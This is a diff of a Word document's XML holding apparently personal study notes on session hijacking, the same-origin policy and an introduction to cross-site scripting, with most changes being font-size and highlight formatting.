+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is this communication between the 2 parties might be weak enough for somebody to break the connection, jump in and  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>assume (usurp)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The role of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>bank ,take</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> over the role.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>This is session hijacking.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Even if things are connection based shouldn’t be possible for someone to cut connection as I’m speaking to my bank.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Session hijacking isn’t just a problem for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>packet based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> protocols like HTTP,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Cross-site scripting</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(XSS attack)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>A kid whose name was Bobby Tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Soon after changing name to Bobby Script, he started to see special messages on any new website he signs up to.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>What can happen in that case is that somebody else can come along and usurp the connection and take over here and continue communicating with the bank.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>We do have a problem with packet based communication</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> , is this communication between the 2 parties might be weak enough for somebody to break the connection, jump in and  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>assume (usurp)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>The role of bank ,take over the role.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>This is session hijacking.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Even if things are connection based shouldn’t be possible for someone to cut connection as I’m speaking to my bank.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Session hijacking isn’t just a problem for packet based protocols like HTTP,</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Cross-site scripting</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> attack</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(XSS attack)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>A kid whose name was Bobby Tables</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Soon after changing name to Bobby Script, he started to see special messages on any new website he signs up to.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="green"/>
-        </w:rPr>
         <w:t>Same origin Policy (SOP) – Stops one website from reading or writing data to another.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Policy checks for 3 different things in the origin.</w:t>
@@ -339,11 +1082,17 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve">1)Protocol </w:t>
@@ -352,11 +1101,17 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve">2)Host </w:t>
@@ -365,294 +1120,911 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>3)Port</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Only if 3 are same for 2 different origins, browser allows cross-origin read and write.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Only if 3 are same for 2 different origins, browser allows cross-origin </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>read</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and write.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">If we have 2 websites – </w:t>
       </w:r>
       <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cstheme="minorHAnsi"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
           </w:rPr>
           <w:t>http://pwnfunction.com</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> and other http://hackfunction.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and other </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>http://hackfunction.com</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Browser checks if protocol same in both cases – it is same (http)</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Checks for host(obviously they’re different)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Checks for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>host(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>obviously they’re different)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">One is </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>pwnfunction</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> , other is </w:t>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> other is </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>hackfunction</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> so browser blocks cross origin read and write.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>This is</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> great feature, ensuring basic web security.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">What if we have control of </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>javascript</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> of another website</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Javascript</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> has access to HTML via DOM API’s which are provided by browser. Can manipulate DOM and make it different ,like defacing page.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> has access to HTML via DOM API’s which are provided by browser. Can manipulate DOM and make it </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>different ,like</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> defacing page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">Can steal </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>csrf</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> tokens or read some cookies. Having access to </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>javascript</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> on another website in a different user’s context can be very problematic.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Can we inject </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>js</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> into another website? Yes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">That is exactly </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XSS ,a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> injection technique.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">When we click on </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>button ,we</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> send out HTTP request. Name is sent out as GET parameter.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> After server processes </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>information ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it returns a response.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Can we inject </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>js</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> into another website? Yes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">That is exactly XSS ,a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javascript</w:t>
-      </w:r>
